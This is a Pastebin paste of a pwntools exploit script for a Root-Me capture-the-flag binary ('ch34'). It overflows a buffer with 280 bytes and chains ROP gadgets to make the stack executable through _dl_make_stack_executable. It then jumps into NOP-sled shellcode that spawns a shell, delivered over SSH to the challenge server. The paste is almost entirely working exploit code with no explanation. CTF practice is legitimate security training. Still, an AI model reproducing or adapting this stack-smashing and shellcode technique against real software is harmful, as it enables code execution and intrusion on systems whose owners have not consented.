Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- context.arch = "amd64"
- elf = ELF("ch34")
- rop = ROP(elf)
- rop.raw(next(elf.search(asm('pop rcx; ret;'))))
- rop.raw(7)
- rop.raw(next(elf.search(asm('pop rdx; ret;'))))
- rop.raw(elf.symbols['__stack_prot'])
- rop.raw(next(elf.search(asm('mov [rdx], rcx; ret;'))))
- rop.call('_dl_make_stack_executable', [elf.symbols['__libc_stack_end']])
- rop.raw(next(elf.search(asm('call rsp'))))
- print(rop.dump())
- payload = "A"*280 + str(rop) + "\x90"*128 + asm(shellcraft.sh())
- s = ssh(host='challenge03.root-me.org', port=2223, user='app-systeme-ch34', password='app-systeme-ch34')
- p = s.process(['./ch34'])
- p.sendline(payload)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement